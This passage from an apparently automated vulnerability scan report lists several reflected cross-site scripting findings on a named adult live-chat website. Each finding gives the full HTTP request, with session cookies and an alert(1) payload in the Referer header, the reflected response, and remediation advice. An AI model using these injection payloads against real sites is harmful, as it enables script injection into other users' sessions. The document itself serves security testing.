Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=3bd48'-alert(1)-'6c03af217a6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:40 GMT
Connection: close
Content-Length: 23212
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
avascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/&rf=http://www.google.com/search?hl=en^q=3bd48'-alert(1)-'6c03af217a6&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.971. http://imlive.com/live-sex-chats/orgies/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/orgies/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2f14'-alert(1)-'1a0426053d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/orgies/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=e2f14'-alert(1)-'1a0426053d6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:37 GMT
Connection: close
Content-Length: 49057
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/&rf=http://www.google.com/search?hl=en^q=e2f14'-alert(1)-'1a0426053d6&qs=cat=1^roomid=14&qs=cat=1^roomid=14&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.972. http://imlive.com/live-sex-chats/pornstars/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/pornstars/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ae9'-alert(1)-'abc512c790d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/pornstars/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=58ae9'-alert(1)-'abc512c790d

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:47 GMT
Connection: close
Content-Length: 265847
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/&rf=http://www.google.com/search?hl=en^q=58ae9'-alert(1)-'abc512c790d&qs=cat=1^roomid=249&qs=cat=1^roomid=249&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

4.973. http://imlive.com/live-sex-chats/role-play/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/role-play/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43a6f'-alert(1)-'e56dafa5755 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/role-play/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=43a6f'-alert(1)-'e56dafa5755

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:56 GMT
Connection: close
Content-Length: 53309
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/&rf=http://www.google.com/search?hl=en^q=43a6f'-alert(1)-'e56dafa5755&qs=cat=1^roomid=-999&qs=cat=1^roomid=-999&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if
...[SNIP]...

4.974. http://imlive.com/live-sex-chats/sex-show-galleries/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-galleries/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cde'-alert(1)-'7896e5dc643 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-galleries/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=98cde'-alert(1)-'7896e5dc643

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:26 GMT
Connection: close
Content-Length: 29317
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/&rf=http://www.google.com/search?hl=en^q=98cde'-alert(1)-'7896e5dc643&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.975. http://imlive.com/live-sex-chats/sex-show-photos/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-photos/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec165'-alert(1)-'39542b02b36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-photos/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ec165'-alert(1)-'39542b02b36

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 25154
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/&rf=http://www.google.com/search?hl=en^q=ec165'-alert(1)-'39542b02b36&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.976. http://imlive.com/live-sex-chats/sex-show-sessions/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-sessions/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd985'-alert(1)-'f1142f5eb83 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-sessions/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=bd985'-alert(1)-'f1142f5eb83

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:47 GMT
Connection: close
Content-Length: 25492
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/&rf=http://www.google.com/search?hl=en^q=bd985'-alert(1)-'f1142f5eb83&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.977. http://imlive.com/live-sex-chats/sex-video-features/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-video-features/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2392'-alert(1)-'0c423d5641 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-video-features/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=b2392'-alert(1)-'0c423d5641

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
